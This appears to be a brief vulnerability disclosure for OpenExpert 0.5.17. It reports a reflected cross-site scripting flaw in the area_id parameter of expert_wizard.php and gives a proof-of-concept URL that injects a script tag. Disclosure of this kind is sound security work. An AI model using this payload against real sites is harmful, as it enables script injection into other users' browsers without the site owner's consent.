Home / os / winmobile

OpenExpert 0.5.17 Cross Site Scripting

Posted on 18 January 2017

# Title : Openexpert 0.5.17 - Cross Site Scripting

# Author: Nassim Asrir

# Author Company: Henceforth

# Tested on: Winxp sp3 - win7

# Vendor: https://sourceforge.net/projects/law-expert/

# Download Software: https://sourceforge.net/projects/law-expert/files/

#################################################

## About The Product : ##

OpenExpert. Dual use Web based and Easy to Use Expert System or Education System.

## Vulnerability : ##

- Vulnerable Parametre : area_id

- HTTP Method : GET

- To exploit it : http://HOST/expert_wizard.php?area_id="><script>alert(1);</script>

 

TOP